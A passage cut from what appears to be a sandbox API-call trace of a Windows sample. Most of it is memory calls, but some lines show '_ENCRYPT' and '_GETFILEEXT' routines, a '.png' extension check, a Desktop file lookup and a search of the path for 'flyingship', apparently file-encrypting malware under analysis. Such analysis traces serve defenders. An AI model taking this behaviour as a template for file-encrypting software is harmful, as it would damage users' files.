hHeap=0x650000) returned 1 [0075.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0075.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0075.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0075.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0075.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0075.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0075.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5b8 | out: hHeap=0x650000) returned 1 [0075.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0075.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0075.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0075.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0075.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e090 | out: hHeap=0x650000) returned 1 [0075.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0075.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0075.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x696ad0 | out: hHeap=0x650000) returned 1 [0075.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0075.131] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0075.131] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0075.131] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908d0 [0075.131] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0075.131] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0075.131] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.131] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.131] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0075.132] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0075.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.132] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0075.132] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0075.132] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9728 [0075.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0075.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.132] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8978 [0075.132] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.132] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d770 [0075.132] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e090 [0075.132] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0075.132] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0075.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.132] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0075.132] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0075.132] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0075.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.132] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0075.132] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0075.132] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5b8 [0075.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.132] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0075.132] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0075.132] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6d8 [0075.132] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.132] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0075.132] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0075.132] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0075.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.133] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690970 [0075.133] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5e8 [0075.133] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0075.133] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0075.133] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0075.133] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0075.133] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0075.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0075.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0075.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.133] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d860 [0075.133] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0075.133] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0075.133] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0075.133] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0075.133] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0075.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0075.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0075.133] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.133] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.133] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0075.133] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0075.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.133] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76ae68 [0075.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x76ae68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0075.134] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0075.134] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0075.134] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0075.134] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.134] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6f8 [0075.134] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0075.134] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.134] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6f8 | out: hHeap=0x650000) returned 1 [0075.134] CloseHandle (hObject=0x140) returned 1 [0075.134] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0075.134] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0075.134] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0075.134] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0075.134] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0075.134] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0075.134] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0075.134] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0075.134] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.134] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0075.134] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0075.134] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0075.134] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0075.134] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0075.134] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0075.134] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.134] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0075.134] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.134] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.135] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d860 | out: hHeap=0x650000) returned 1 [0075.135] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0075.135] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.135] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0075.135] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e090 | out: hHeap=0x650000) returned 1 [0075.135] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0075.135] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0075.135] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5b8 | out: hHeap=0x650000) returned 1 [0075.135] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0075.135] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0075.135] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0075.135] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0075.135] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d770 | out: hHeap=0x650000) returned 1 [0075.135] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0075.135] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0075.135] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.135] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.135] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690960 [0075.135] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0075.135] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0075.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0075.135] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.135] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690740 [0075.135] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7c0 [0075.135] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0075.135] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.135] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0075.135] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0075.135] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0075.135] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0075.135] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0075.136] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690980 [0075.136] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d860 [0075.136] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0075.136] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690960 [0075.136] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0075.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.136] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0075.136] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.136] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0075.136] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0075.136] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690910 [0075.136] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9728 [0075.136] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e510 [0075.136] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0075.136] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.136] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.136] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5eb2fb80, ftCreationTime.dwHighDateTime=0x1d5e34e, ftLastAccessTime.dwLowDateTime=0x2454b2e0, ftLastAccessTime.dwHighDateTime=0x1d5e10e, ftLastWriteTime.dwLowDateTime=0x2454b2e0, ftLastWriteTime.dwHighDateTime=0x1d5e10e, nFileSizeHigh=0x0, nFileSizeLow=0x44c1, dwReserved0=0x0, dwReserved1=0x657690, cFileName="bqTv.png", cAlternateFileName="")) returned 0x6b89b8 [0075.136] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0075.136] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.136] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5eb2fb80, ftCreationTime.dwHighDateTime=0x1d5e34e, ftLastAccessTime.dwLowDateTime=0x2454b2e0, ftLastAccessTime.dwHighDateTime=0x1d5e10e, ftLastWriteTime.dwLowDateTime=0x2454b2e0, ftLastWriteTime.dwHighDateTime=0x1d5e10e, nFileSizeHigh=0x0, nFileSizeLow=0x44c1, dwReserved0=0x0, dwReserved1=0x657690, cFileName="bqTv.png", cAlternateFileName="")) returned 0x6b89b8 [0075.136] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0075.137] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, 